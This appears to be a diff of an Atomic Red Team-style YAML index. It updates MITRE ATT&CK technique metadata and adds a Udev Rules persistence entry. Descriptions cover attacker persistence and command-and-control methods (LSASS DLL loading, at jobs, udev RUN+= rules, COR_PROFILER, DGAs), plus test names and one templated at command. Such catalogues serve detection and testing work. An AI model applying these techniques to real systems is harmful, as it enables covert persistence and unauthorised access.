       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -73402,7 +73779,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests:
     - name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -73446,7 +73822,7 @@ persistence:
         elevation_required: true
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -73486,8 +73862,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -73495,13 +73873,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -73532,9 +73910,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -73735,10 +74110,10 @@ persistence:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -73801,7 +74176,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -73835,8 +74210,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -73845,6 +74220,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -73857,7 +74236,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -73922,7 +74300,7 @@ persistence:
         command: 'echo "#{at_command}" | at #{time_spec}'
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -73935,6 +74313,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -73971,17 +74350,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -74027,9 +74406,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -74066,7 +74501,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -74090,7 +74525,6 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests:
     - name: Netsh Helper DLL Registration
@@ -74130,46 +74564,7 @@ persistence:
         elevation_required: true
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -74192,20 +74587,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -74235,7 +74667,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -74259,12 +74691,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -74348,11 +74778,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -74404,9 +74833,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -74705,7 +75133,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -74743,8 +75171,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -74880,7 +75306,7 @@ persistence:
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -74943,7 +75369,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -75001,7 +75426,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests:
     - name: Base64 Encoded data.
@@ -75091,92 +75515,91 @@ command-and-control:
         name: powershell
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
